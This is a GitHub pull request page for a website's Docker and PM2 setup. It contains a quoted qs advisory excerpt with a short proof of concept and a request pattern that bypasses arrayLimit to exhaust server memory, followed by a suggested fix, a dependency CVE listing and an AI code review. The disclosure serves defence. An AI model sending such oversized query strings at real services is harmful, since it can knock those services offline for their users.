const result = qs.parse(attack, { arrayLimit: 100 });
console.log(result.a.length);  // Output: 10000 (should be max 100)

Configuration:

  • arrayLimit: 5 (test 1) or arrayLimit: 100 (test 2)
  • Use bracket notation: a[]=value (not indexed a[0]=value)

Impact

Denial of Service via memory exhaustion. Affects applications using qs.parse() with user-controlled input and arrayLimit for protection.

Attack scenario:

  1. Attacker sends HTTP request: GET /api/search?filters[]=x&filters[]=x&...&filters[]=x (100,000+ times)
  2. Application parses with qs.parse(query, { arrayLimit: 100 })
  3. qs ignores limit, parses all 100,000 elements into array
  4. Server memory exhausted → application crashes or becomes unresponsive
  5. Service unavailable for all users

Real-world impact:

  • Single malicious request can crash server
  • No authentication required
  • Easy to automate and scale
  • Affects any endpoint parsing query strings with bracket notation

Suggested Fix

Add arrayLimit validation to the bracket notation handler. The code already calculates currentArrayLength at line 147-151, but it's not used in the bracket notation handler at line 159.

Current code (lib/parse.js:159-162):

if (root === '[]' && options.parseArrays) {
    obj = options.allowEmptyArrays && (leaf === '' || (options.strictNullHandling && leaf === null))
        ? []
        : utils.combine([], leaf);  // No arrayLimit check
}

Fixed code:

if (root === '[]' && options.parseArrays) {
    // Use currentArrayLength already calculated at line 147-151
    if (options.throwOnLimitExceeded && currentArrayLength >= options.arrayLimit) {
        throw new RangeError('Array limit exceeded. Only ' + options.arrayLimit + ' element' + (options.arrayLimit === 1 ? '' : 's') + ' allowed in an array.');
    }
    
    // If limit exceeded and not throwing, convert to object (consistent with indexed notation behavior)
    if (currentArrayLength >= options.arrayLimit) {
        obj = options.plainObjects ? { __proto__: null } : {};
        obj[currentArrayLength] = leaf;
    } else {
        obj = options.allowEmptyArrays && (leaf === '' || (options.strictNullHandling && leaf === null))
            ? []
            : utils.combine([], leaf);
    }
}

This makes bracket notation behaviour consistent with indexed notation, enforcing arrayLimit and converting to object when limit is exceeded (per README documentation).

critical: 0 high: 1 medium: 0 low: 0 async 1.5.2 (npm)

pkg:npm/async@1.5.2

high 7.8: CVE--2021--43138 OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities

Affected range<2.6.4
Fixed version2.6.4, 3.2.2
CVSS Score7.8
CVSS VectorCVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EPSS Score0.706%
EPSS Percentile72nd percentile
Description

A vulnerability exists in Async through 3.2.1 (fixed in 3.2.2), which could let a malicious user obtain privileges via the mapValues() method.

Copy link
Contributor

@coderabbitai coderabbitai bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Actionable comments posted: 5

🤖 Fix all issues with AI agents
In `@Dockerfile`:
- Around line 3-4: The Dockerfile uses ARG NODE_ENV=production which is
build-time only; update the runtime stage to export NODE_ENV so it exists in
containers (e.g., in the final stage set ENV NODE_ENV=${NODE_ENV} or explicitly
ENV NODE_ENV=production) and mirror this for any other ARGs noted (lines 18-22);
locate the ARG NODE_ENV declaration and the final/runtime stage in the
Dockerfile and add the ENV assignment there so the runtime process sees
NODE_ENV=production.
- Around line 12-13: The runtime image currently copies the whole /app including
node_modules built with devDependencies (the RUN npm ci $NPM_INSTALL_FLAGS
step), so prune devDependencies before the final COPY to shrink the image and
reduce attack surface: after installing in the build stage (where RUN npm ci
$NPM_INSTALL_FLAGS runs), run a production-only prune (e.g., npm prune
--production or install with production-only flags / NPM_CONFIG_PRODUCTION) or
remove dev deps from /app/node_modules, then copy only the pruned
/app/node_modules into the runtime stage so the final image does not contain
devDependencies.
- Line 1: Update the Docker base image to a supported LTS by replacing the FROM
reference "FROM node:23-alpine" with a current LTS tag (e.g., "FROM
node:24-alpine" or "FROM node:22-alpine") so the container uses a maintained
Node release; ensure any related build/test scripts or CI that reference node:23
are updated accordingly.
- Around line 26-27: The Dockerfile pins wget to an invalid Alpine revision (RUN
apk add --no-cache wget=1.25.0-r1) which fails on node:23-alpine (Alpine 3.21);
fix by either changing the base image to a fixed Alpine release tag (e.g.,
node:23-alpine3.21) or removing the package revision pin (use RUN apk add
--no-cache wget or pin to wget=1.25.0-r0), and update the RUN line accordingly
so it matches the available package in the chosen base image.

In `@website/package.json`:
- Line 7: The start script currently uses "pm2-runtime app.js -i max" which can
oversubscribe CPUs in containers; change the "start" script (package.json
"start") to read an environment variable like PM2_INSTANCES and pass that to
pm2-runtime instead of "-i max", and ensure the container entrypoint or a small
startup helper (e.g., scripts/generate_constants.js or a new
scripts/detect_pm2_instances.sh invoked before pm2-runtime) computes a safe
default from cgroup CPU limits and sets PM2_INSTANCES when it is not provided.

@@ -1,38 +1,39 @@
FROM node:23-alpine
FROM node:23-alpine AS build
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

🏁 Script executed:

# First, find and read the Dockerfile
find . -name "Dockerfile" -type f

Repository: speedandfunction/website

Length of output: 105


🌐 Web query:

Node.js LTS versions 2025 2026 current supported versions

💡 Result:

Currently supported Node.js major versions (as of Jan 29, 2026)

  • Node.js 25.xCurrent (not LTS); supported until Jun 1, 2026 (EOL). [2]
  • Node.js 24.x (Krypton)Active LTS; EOL Apr 30, 2028. [1][2]
  • Node.js 22.x (Jod)Maintenance LTS; EOL Apr 30, 2027. [1][2]
  • Node.js 20.x (Iron)Maintenance LTS; EOL Apr 30, 2026. [1][2]

LTS status across 2025–2026 (key transitions)

  • Node.js 24.x: released May 6, 2025, entered Active LTS on Oct 28, 2025, enters Maintenance on Oct 20, 2026. [2]
  • Node.js 22.x: entered Maintenance LTS on Oct 21, 2025 (so it was Active LTS before that). [2]
  • Node.js 20.x: in Maintenance LTS throughout 2025 and into early 2026; EOL Apr 30, 2026. [2]
  • Node.js 18.x: reached EOL Apr 30, 2025 (not supported after that). [1]

Sources: Node.js official releases list [1] and the Node.js Release WG schedule (authoritative lifecycle dates) [2].


🏁 Script executed:

# Read the main Dockerfile to verify the content at lines 1 and 18
cat -n ./Dockerfile | head -30

Repository: speedandfunction/website

Length of output: 950


Switch from Node 23 to a supported LTS version.

Node 23 is out of security support. Use Node 24 (Active LTS until Apr 2028) or Node 22 (Maintenance LTS until Apr 2027). Avoid Node 20 as it EOLs Apr 30, 2026.

🔧 Suggested change
-FROM node:23-alpine AS build
+FROM node:24-alpine AS build
...
-FROM node:23-alpine
+FROM node:24-alpine

Also applies to: 18-18

🧰 Tools
🪛 Checkov (3.2.334)

[low] 1-39: Ensure that HEALTHCHECK instructions have been added to container images

(CKV_DOCKER_2)

🤖 Prompt for AI Agents
In `@Dockerfile` at line 1, Update the Docker base image to a supported LTS by
replacing the FROM reference "FROM node:23-alpine" with a current LTS tag (e.g.,
"FROM node:24-alpine" or "FROM node:22-alpine") so the container uses a
maintained Node release; ensure any related build/test scripts or CI that
reference node:23 are updated accordingly.

Comment on lines +3 to +4
ARG NODE_ENV=production
ARG NPM_INSTALL_FLAGS=
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🟠 Major

NODE_ENV build ARG doesn’t carry into runtime.

ARG is build‑time only, so the runtime container will default to development unless the env is set elsewhere. Ensure NODE_ENV=production is set in the runtime stage.

🔧 Suggested change
 FROM node:23-alpine
+ARG NODE_ENV=production
+ENV NODE_ENV=$NODE_ENV

Also applies to: 18-22

🤖 Prompt for AI Agents
In `@Dockerfile` around lines 3 - 4, The Dockerfile uses ARG NODE_ENV=production
which is build-time only; update the runtime stage to export NODE_ENV so it
exists in containers (e.g., in the final stage set ENV NODE_ENV=${NODE_ENV} or
explicitly ENV NODE_ENV=production) and mirror this for any other ARGs noted
(lines 18-22); locate the ARG NODE_ENV declaration and the final/runtime stage
in the Dockerfile and add the ENV assignment there so the runtime process sees
NODE_ENV=production.

Comment on lines +12 to +13
# Install dependencies based on environment and flags
RUN npm ci $NPM_INSTALL_FLAGS
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

🏁 Script executed:

fd -t f Dockerfile | head -20

Repository: speedandfunction/website

Length of output: 101


🏁 Script executed:

cat -n Dockerfile

Repository: speedandfunction/website

Length of output: 1157


🏁 Script executed:

cat -n website/package.json | head -30

Repository: speedandfunction/website

Length of output: 1350


🏁 Script executed:

cat -n website/package.json | tail -50

Repository: speedandfunction/website

Length of output: 1865


Remove devDependencies from runtime image.

Multi-stage build copies entire /app including node_modules with devDependencies from the build stage. Prune dev dependencies before copying to runtime to reduce image size and attack surface.

🔧 Suggested change
-RUN npm ci $NPM_INSTALL_FLAGS
+RUN npm ci $NPM_INSTALL_FLAGS \
+  && npm prune --omit=dev

Also applies to: 30-30

🤖 Prompt for AI Agents
In `@Dockerfile` around lines 12 - 13, The runtime image currently copies the
whole /app including node_modules built with devDependencies (the RUN npm ci
$NPM_INSTALL_FLAGS step), so prune devDependencies before the final COPY to
shrink the image and reduce attack surface: after installing in the build stage
(where RUN npm ci $NPM_INSTALL_FLAGS runs), run a production-only prune (e.g.,
npm prune --production or install with production-only flags /
NPM_CONFIG_PRODUCTION) or remove dev deps from /app/node_modules, then copy only
the pruned /app/node_modules into the runtime stage so the final image does not
contain devDependencies.

Comment on lines +26 to +27
# Install dependencies needed for health checks with pinned version
RUN apk add --no-cache wget=1.25.0-r1
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🔴 Critical

🧩 Analysis chain

🏁 Script executed:

cd /dev/null && find . -name "Dockerfile" -type f 2>/dev/null | head -20

Repository: speedandfunction/website

Length of output: 117


🏁 Script executed:

cat -n Dockerfile | head -40

Repository: speedandfunction/website

Length of output: 1157


🏁 Script executed:

# Check the Alpine base image being used
grep -n "FROM" Dockerfile | head -5

Repository: speedandfunction/website

Length of output: 121


🏁 Script executed:

# Check Alpine package versioning practices and wget availability
# Let's also verify if this pattern is indeed problematic by researching Alpine versioning
web_search
Alpine Linux package version pinning node:alpine floating tag

Repository: speedandfunction/website

Length of output: 163


🏁 Script executed:

# Check if there are any other similar patterns in the Dockerfile
rg "apk add.*=" Dockerfile

Repository: speedandfunction/website

Length of output: 105


🏁 Script executed:

# Verify the node:23-alpine tag specifics
web_search
node:23-alpine base image tag floating Alpine version

Repository: speedandfunction/website

Length of output: 171


🌐 Web query:

Alpine Linux package version pinning floating base image compatibility

💡 Result:

  • Pin the Alpine base image first (don’t float). If you use a floating tag like alpine:latest (or latest-stable-style tags), the underlying Alpine release (and thus its repositories) can change over time, which breaks reproducibility and can make previously-available package versions disappear from the solver’s view. Prefer a fixed release tag (e.g., alpine:3.20) or an image digest for fully repeatable builds. [6]

  • Package-version pinning in Alpine is “release-branch scoped”. apk resolves packages from the repositories listed in /etc/apk/repositories, and each stable Alpine release branch has its own repositories. So a package version you pinned must exist in that same branch’s repo, or installs will fail. [5]

  • How to pin package versions (apk constraints).

    • In a Dockerfile/build step: apk add pkg=1.2.3-r0 (exact pin) or use range/fuzzy constraints like pkg<…, pkg>…, pkg~… as supported by apk’s dependency notation. [7]
    • Persistently: pins live in the world file (/etc/apk/world) with the format name{@tag}{[<>~=]version}. [0][2]
  • Avoid “edge” for deterministic pinning, and don’t mix edge + stable repos.

    • Alpine explicitly warns that edge is not appropriate when you need deterministic, repeatable installs via pinning (packages can change/rebuild/revoke). [5][7]
    • Alpine also warns: do not enable stable and edge repositories at the same time; mixing them can break the system. [3]

Practical compatibility rule: Fixed base image release (or digest) + /etc/apk/repositories pointing to that same release branch + package pins that exist in that branch ⇒ repeatable. Floating base image tags make that compatibility fragile because the repo branch you’re implicitly targeting can shift underneath your pins. [5][6][7]


🌐 Web query:

node:23-alpine Alpine version what version does it use

💡 Result:

node:23-alpine is built on Alpine Linux 3.21 (the image layer shown is alpine-minirootfs-3.21.3-..., i.e., Alpine 3.21.3). [1]

If you want it explicitly pinned, use node:23-alpine3.21. [2]

Sources: [1], [2]


🌐 Web query:

Alpine apk package versions availability across releases wget

💡 Result:

You can check what versions of an Alpine package exist in each Alpine release branch by querying each branch’s repository index (APKINDEX.tar.gz) (or via the packages web UI).

Option A: Query versions across releases using wget + APKINDEX.tar.gz

Alpine repos publish an APKINDEX.tar.gz per repo/arch; inside is a text APKINDEX with per-package records including P: (name) and V: (version). (wiki.alpinelinux.org)

Example (x86_64, main, package openssl), comparing multiple releases:

pkg=openssl
arch=x86_64
repo=main

for rel in v3.18 v3.19 v3.20 v3.21 edge; do
  url="https://dl-cdn.alpinelinux.org/alpine/$rel/$repo/$arch/APKINDEX.tar.gz"
  ver=$(
    wget -qO- "$url" \
    | tar -xzO APKINDEX \
    | awk -v p="$pkg" '
        $0=="P:"p {hit=1}
        hit && /^V:/ {print substr($0,3); exit}
        /^$/ {hit=0}
      '
  )
  printf "%-6s  %s\n" "$rel" "${ver:-NOT_FOUND}"
done

To list all versions present in that branch index (if multiple entries exist), remove the exit and print every matching V:.

Repo URL pattern and the fact that Alpine repos are indexed by APKINDEX.tar.gz is standard for apk repositories. (wiki.alpinelinux.org)

Option B: Download the actual .apk with wget

Once you know the exact version (e.g., openssl-3.1.5-r0), the file is typically:

wget "https://dl-cdn.alpinelinux.org/alpine/v3.19/main/x86_64/openssl-3.1.5-r0.apk"

(You can also confirm filenames by browsing the repo directory listing for that release/repo/arch.) (dl-cdn.alpinelinux.org)

Option C (often easiest): Use the Alpine packages web UI

Use https://pkgs.alpinelinux.org/packages and switch the branch (e.g., v3.19, v3.20, edge) to see which versions are available. (superuser.com)

Option D: Use apk to fetch without installing

apk fetch downloads packages (and can be combined with selecting specific repos via your repositories configuration). (wiki.alpinelinux.org)


If you tell me package name, arch (e.g., x86_64/aarch64), and which branches you care about (e.g., v3.19–v3.21 + edge), I can tailor the exact one-liner/script.

Citations:


🏁 Script executed:

# Verify if wget=1.25.0-r1 is available in Alpine 3.21 (the base of node:23-alpine)
# Query the Alpine 3.21 APKINDEX for wget versions
python3 << 'EOF'
import urllib.request
import tarfile
import io

# Alpine 3.21 repository
url = "https://dl-cdn.alpinelinux.org/alpine/v3.21/main/x86_64/APKINDEX.tar.gz"

try:
    response = urllib.request.urlopen(url)
    tar_data = tarfile.open(fileobj=io.BytesIO(response.read()), mode='r:gz')
    
    # Extract and read APKINDEX
    apkindex = tar_data.extractfile('APKINDEX').read().decode('utf-8')
    
    # Parse APKINDEX to find wget versions
    lines = apkindex.split('\n')
    current_pkg = None
    in_wget = False
    wget_versions = []
    
    for line in lines:
        if line.startswith('P:'):
            current_pkg = line[2:]
            in_wget = (current_pkg == 'wget')
        elif line.startswith('V:') and in_wget:
            wget_versions.append(line[2:])
    
    print("wget versions in Alpine 3.21:")
    for v in wget_versions:
        print(f"  - {v}")
        if v == "1.25.0-r1":
            print("    ^ MATCH: wget=1.25.0-r1 is available in Alpine 3.21")
            
except Exception as e:
    print(f"Error: {e}")
EOF

Repository: speedandfunction/website

Length of output: 202


🏁 Script executed:

# Also check what happens if node:23 advances to a future Alpine version
# Check if wget=1.25.0-r1 exists in other Alpine versions (3.20, 3.19, edge)
python3 << 'EOF'
import urllib.request
import tarfile
import io

versions = ['v3.20', 'v3.19', 'edge']

for rel in versions:
    url = f"https://dl-cdn.alpinelinux.org/alpine/{rel}/main/x86_64/APKINDEX.tar.gz"
    try:
        response = urllib.request.urlopen(url, timeout=5)
        tar_data = tarfile.open(fileobj=io.BytesIO(response.read()), mode='r:gz')
        apkindex = tar_data.extractfile('APKINDEX').read().decode('utf-8')
        
        # Find wget versions
        lines = apkindex.split('\n')
        current_pkg = None
        in_wget = False
        wget_versions = []
        
        for line in lines:
            if line.startswith('P:'):
                current_pkg = line[2:]
                in_wget = (current_pkg == 'wget')
            elif line.startswith('V:') and in_wget:
                wget_versions.append(line[2:])
        
        has_target = "1.25.0-r1" in wget_versions
        status = "✓ HAS 1.25.0-r1" if has_target else "✗ MISSING 1.25.0-r1"
        print(f"{rel:10} {status}  (available: {', '.join(wget_versions[:3])}...)")
            
    except Exception as e:
        print(f"{rel:10} Error: {e}")
EOF

Repository: speedandfunction/website

Length of output: 505


🏁 Script executed:

# Try with curl and insecure flag to bypass SSL issues
python3 << 'EOF'
import subprocess
import tarfile
import io
import json

# Attempt to fetch without SSL verification using curl
url = "https://dl-cdn.alpinelinux.org/alpine/v3.21/main/x86_64/APKINDEX.tar.gz"

try:
    # Use curl with insecure flag
    result = subprocess.run(
        ['curl', '-s', '-k', url],
        capture_output=True,
        timeout=10
    )
    
    if result.returncode == 0 and result.stdout:
        tar_data = tarfile.open(fileobj=io.BytesIO(result.stdout), mode='r:gz')
        apkindex = tar_data.extractfile('APKINDEX').read().decode('utf-8')
        
        # Parse for wget
        lines = apkindex.split('\n')
        in_wget = False
        wget_versions = []
        
        for line in lines:
            if line.startswith('P:wget'):
                in_wget = True
            elif line.startswith('V:') and in_wget:
                wget_versions.append(line[2:])
                in_wget = False
        
        if wget_versions:
            print(f"wget versions in Alpine 3.21: {wget_versions}")
        else:
            print("Could not parse wget version")
    else:
        print(f"curl failed: {result.stderr.decode() if result.stderr else 'no output'}")
        
except Exception as e:
    print(f"Error: {e}")
EOF

Repository: speedandfunction/website

Length of output: 124


🏁 Script executed:

# Check if there's any documentation or comments in the repo about this
rg -i "alpine\|wget\|version.*pin" README.md docs/ 2>/dev/null | head -20

Repository: speedandfunction/website

Length of output: 50


🏁 Script executed:

# This is critical - wget=1.25.0-r1 doesn't exist in Alpine 3.21, only 1.25.0-r0
# Let me verify this is indeed an issue by checking if the build would fail
# Check other Alpine versions to see if r1 exists anywhere
python3 << 'EOF'
import subprocess
import tarfile
import io

versions = ['v3.21', 'v3.20', 'v3.19', 'edge']

print("Checking wget availability across Alpine releases:\n")

for rel in versions:
    url = f"https://dl-cdn.alpinelinux.org/alpine/{rel}/main/x86_64/APKINDEX.tar.gz"
    
    try:
        result = subprocess.run(
            ['curl', '-s', '-k', url],
            capture_output=True,
            timeout=10
        )
        
        if result.returncode == 0 and result.stdout:
            tar_data = tarfile.open(fileobj=io.BytesIO(result.stdout), mode='r:gz')
            apkindex = tar_data.extractfile('APKINDEX').read().decode('utf-8')
            
            # Parse for wget versions
            lines = apkindex.split('\n')
            in_wget = False
            wget_versions = []
            
            for line in lines:
                if line.startswith('P:wget'):
                    in_wget = True
                elif line.startswith('V:') and in_wget:
                    wget_versions.append(line[2:])
                    in_wget = False
            
            has_r1 = any('1.25.0-r1' in v for v in wget_versions)
            has_r0 = any('1.25.0-r0' in v for v in wget_versions)
            
            status = ""
            if has_r1:
                status = "✓ HAS 1.25.0-r1"
            elif has_r0:
                status = "○ HAS 1.25.0-r0 only (r1 missing)"
            else:
                status = "✗ Different version"
            
            print(f"{rel:10} {status:30} {wget_versions}")
        
    except Exception as e:
        print(f"{rel:10} Error: {e}")

print("\n*** wget=1.25.0-r1 does NOT exist in Alpine 3.21 (node:23-alpine base)")
EOF

Repository: speedandfunction/website

Length of output: 470


🏁 Script executed:

# Verify the concrete issue: this Dockerfile would actually fail to build
# because wget=1.25.0-r1 doesn't exist in Alpine 3.21
echo "Summary of findings:"
echo "1. Base image: node:23-alpine uses Alpine 3.21.3"
echo "2. Pinned version: wget=1.25.0-r1 (from line 27)"
echo "3. Available in Alpine 3.21: wget 1.25.0-r0 ONLY"
echo "4. Result: Build would FAIL with 'wget=1.25.0-r1' not found error"
echo ""
echo "The pinned version is incorrect for the base image being used."

Repository: speedandfunction/website

Length of output: 365


Pinned wget=1.25.0-r1 does not exist in Alpine 3.21 and will cause immediate build failures.

node:23-alpine uses Alpine 3.21, which only provides wget 1.25.0-r0. The pinned version 1.25.0-r1 is unavailable. Additionally, since node:23-alpine floats Alpine versions, future updates could introduce further version mismatches. Either pin the Alpine base image to a specific release (e.g., node:23-alpine3.21) or remove the package version pin.

🔧 Suggested change
-RUN apk add --no-cache wget=1.25.0-r1
+RUN apk add --no-cache wget
📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
# Install dependencies needed for health checks with pinned version
RUN apk add --no-cache wget=1.25.0-r1
# Install dependencies needed for health checks with pinned version
RUN apk add --no-cache wget
🤖 Prompt for AI Agents
In `@Dockerfile` around lines 26 - 27, The Dockerfile pins wget to an invalid
Alpine revision (RUN apk add --no-cache wget=1.25.0-r1) which fails on
node:23-alpine (Alpine 3.21); fix by either changing the base image to a fixed
Alpine release tag (e.g., node:23-alpine3.21) or removing the package revision
pin (use RUN apk add --no-cache wget or pin to wget=1.25.0-r0), and update the
RUN line accordingly so it matches the available package in the chosen base
image.

"main": "app.js",
"scripts": {
"start": "node scripts/generate_constants.js && node app @apostrophecms/asset:build && node app.js",
"start": "node scripts/generate_constants.js && node app @apostrophecms/asset:build && pm2-runtime app.js -i max",
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

🏁 Script executed:

# Check if website/package.json exists and read the relevant lines
if [ -f website/package.json ]; then
  echo "=== website/package.json (lines 1-70) ==="
  head -70 website/package.json | cat -n
else
  echo "website/package.json not found"
fi

Repository: speedandfunction/website

Length of output: 2802


🌐 Web query:

pm2-runtime -i max cgroup limits CPU oversubscription container

💡 Result:

pm2-runtime -i max means “start as many cluster instances as the system reports as CPU cores” (i.e., it auto-sizes to CPU core count) [1]. In containers, that can oversubscribe CPU relative to your cgroup limit, because many Node/PM2 setups derive “CPU count” from what the OS reports (often the host’s CPUs), not your container’s quota—e.g., os.cpus().length can still show the host core count even when the container is limited to fewer CPUs [2]. When you then run more busy workers/threads than your quota allows, Linux CFS enforces the quota by throttling once the container uses its allowed CPU time in the period (so you can see worse latency/throughput even though “more workers” were started) [3][4].

What to do in containers

  • Don’t use -i max under CPU quotas; set a fixed instance count that matches your container CPU limit, e.g. pm2-runtime -i 2 … (or whatever your limits.cpu / --cpus is). This is the standard workaround when “max” mis-detects CPUs [5].
  • If you want “auto” sizing, prefer a CPU-count API that’s cgroup-aware: Node now exposes os.availableParallelism() (intended to reflect the CPUs actually available to the process, including container constraints), whereas os.cpus().length can be misleading in containers [2].
  • If possible, use CPU pinning (cpuset) (e.g., Docker --cpuset-cpus / K8s static CPU manager) so “CPU count” inside the container aligns with what the process can actually run on; quota-only limits are the common case where you get throttling with too many workers [3][4].

Rule of thumb: size PM2 instances to roughly the container CPU limit (often ≈ limits.cpu, rounded down, minimum 1). If you set limits.cpu: 2, run -i 2 rather than -i max.

Sources: PM2 -i max behavior [1], Node-in-Docker CPU mis-detection example [2], cgroup quota/throttling mechanics [3][4], explicit instance workaround [5].


🏁 Script executed:

# Search for Dockerfile, docker-compose, k8s config, or deployment hints
find . -maxdepth 3 -type f \( -name "Dockerfile*" -o -name "docker-compose*" -o -name "*.yaml" -o -name "*.yml" -o -name ".dockerignore" \) 2>/dev/null | head -20

Repository: speedandfunction/website

Length of output: 517


🏁 Script executed:

# Check for any .env or configuration files that mention deployment/container
find . -maxdepth 2 -type f \( -name ".env*" -o -name "Procfile" -o -name "ecosystem.config.js" \) 2>/dev/null

Repository: speedandfunction/website

Length of output: 50


🏁 Script executed:

# Check the Dockerfile to understand container configuration
head -50 Dockerfile

Repository: speedandfunction/website

Length of output: 884


🏁 Script executed:

# Check deployment workflows for CPU limit configuration
grep -A 10 -B 5 "cpus\|CPU\|limits" deploy_to_aws.yml deploy_to_railway.yml 2>/dev/null | head -40

Repository: speedandfunction/website

Length of output: 50


Avoid pm2-runtime -i max oversubscribing CPUs in containers.

-i max uses the host core count and ignores cgroup limits, which can spawn too many workers and cause CPU throttling in containerized deployments. Make the instance count configurable (e.g., from PM2_INSTANCES) and set it based on the container's CPU limit.

🔧 Suggested change
-    "start": "node scripts/generate_constants.js && node app `@apostrophecms/asset`:build && pm2-runtime app.js -i max",
+    "start": "node scripts/generate_constants.js && node app `@apostrophecms/asset`:build && pm2-runtime app.js -i ${PM2_INSTANCES:-1}",
📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
"start": "node scripts/generate_constants.js && node app @apostrophecms/asset:build && pm2-runtime app.js -i max",
"start": "node scripts/generate_constants.js && node app `@apostrophecms/asset`:build && pm2-runtime app.js -i ${PM2_INSTANCES:-1}",
🤖 Prompt for AI Agents
In `@website/package.json` at line 7, The start script currently uses "pm2-runtime
app.js -i max" which can oversubscribe CPUs in containers; change the "start"
script (package.json "start") to read an environment variable like PM2_INSTANCES
and pass that to pm2-runtime instead of "-i max", and ensure the container
entrypoint or a small startup helper (e.g., scripts/generate_constants.js or a
new scripts/detect_pm2_instances.sh invoked before pm2-runtime) computes a safe
default from cgroup CPU limits and sets PM2_INSTANCES when it is not provided.

Copy link
Collaborator

@killev killev left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Looks good to me

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

3 participants